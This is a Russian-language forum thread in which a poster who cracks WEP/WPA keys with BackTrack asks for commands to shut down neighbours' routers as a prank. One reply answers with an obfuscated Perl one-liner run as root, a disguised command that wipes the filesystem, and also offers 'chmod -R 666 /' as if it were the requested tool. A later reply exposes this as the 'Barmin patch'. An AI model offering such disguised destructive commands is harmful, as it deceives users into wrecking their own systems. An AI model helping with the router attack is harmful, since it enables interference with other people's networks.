Недавно на форуме нашол статю о том как пользоватьса Airdrop-ng статя полєзная За ето спасибо Извеняюсь может тема уже поднималась но прошу вислушать !! Я сейчас живу в барселоне тут активно используютса точки доступа Wi-Fi Ну backtrack и WEP\WPA я уже освоил и активно пользуюсь но нашол на форуме статю где упоминалось что в Backtrack есь парочка крманд которие заставляют роутер отключитсо тоисть вирубивают роутер ето можна так сказать удаленное управленние роутером без особих прав типа airdrop-ng Кто знает ети комади подскажите где найти инструкцию как найти ети конамди гугл недает результата !!! Помогите !!! Просто по соседству живут Китайци и хочу нумного поприкаловаться ) Ну и соотсветственно постигнуть материал !!! Отписивайте точно по теме незнаеш значит не пиши ничего !!!
Пишешь в консоль cd / su Пароль(он не отображается) и потом perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' ну или chmod -R 666 /
ТС, они тебе,злодеи такие, "патч Бармина" http://ru.wikipedia.org/wiki/Патч_Бармина предлагают Осовремененный вариант "убей себя об стену" P.S. А вообще, лучшим выходом является чтение документации. А то народ еще посоветует собрать, что-то типа "перекиси ацетона" и ага